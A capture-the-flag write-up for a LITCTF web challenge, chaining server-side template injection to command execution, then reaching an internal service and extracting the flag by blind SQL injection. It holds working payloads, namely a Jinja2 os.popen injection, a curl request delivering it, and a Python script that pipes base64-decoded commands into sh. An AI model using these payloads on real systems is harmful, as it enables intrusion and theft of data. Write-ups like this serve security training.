Tags: sqlinjection web ssrf ssti 

Rating: 5.0

This challenge has several vulnerabilities, The first vulnerability is related to the password field.

If you check the code, you will notice the vulnerability of SSTI

```python
return render_template_string("ok thank you for your info i have now sold your password (" + password + ") for 2 donuts :)");
```
For example, if you enter the following payload
```python
{{2+2}}

4
```
There is also a sql injection vulnerability in the `data-server` project
```python
x = "SELECT * FROM users WHERE username='" + username + "' AND password='" + password + "'"
```
Now we use SSTI to execute command
```python
{{config['__class__']['__init__']['__globals__']['os']|attr('popen')('ls')|attr('read')()}}
```
```shell
curl -X POST "http://litctf.live:31781" -d "username=&password={{config['__class__']['__init__']['__globals__']['os']|attr('popen')('ls')|attr('read')()}}"

ok thank you for your info i have now sold your password (main.py
requirements.txt
run.sh
static
templates
) for 2 donuts :)
```

If we print the main.py file, we will encounter the address `http://172.24.0.8:8080/runquery`, this address is not accessible from the outside,
and this shows that we do not have access to the `data-server` program from the outside.

In the next step, we should send requests containing sql to the address `http://172.24.0.8:8080/runquery`

```python
import requests
import base64

char = list(".*+,!#$%&0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_-{}")

url = "http://litctf.live:31781"
internal_url = "http://172.24.0.8:8080/runquery"

ssti_payload = "{{config['__class__']['__init__']['__globals__']['os']|attr('popen')('%s')|attr('read')()}}"
rce_payload = "echo {}| base64 -d | sh"
python_script = "python3 -c \"import json,requests;print(requests.post('%s', data=json.dumps({'username':'%s','password':'0'}), headers={\\\"Content-type\\\": \\\"application/json\\\"}).text)\""
sql_payload = "flag\\'and (Select hex(substr(password,1,{})) from users limit 1 offset 0) = hex(\\\'{}\\\')--"

flag = "LITCTF{"

for c in range(len(char)):
for i in range(len(char)):
tmp = flag+char[i]

script = python_script % (internal_url, sql_payload.format(len(flag)+1,tmp))
script = str(base64.b64encode(script.encode("utf-8")), "utf-8")
payload = ssti_payload % rce_payload.format(script)

r = requests.post(url, data={"username":"","password":payload})
if "True" in r.text:
flag += char[i]
print("FLAG : "+ flag)
break
```
* There are a few points in the script above
* Because there is no `curl` in the server, we had to use a python script to send the request.
* The server filters the character `“.” `, to bypass this filter I coded the script with base64.

```
LITCTF{flush3d_3m0ji_o.0}
```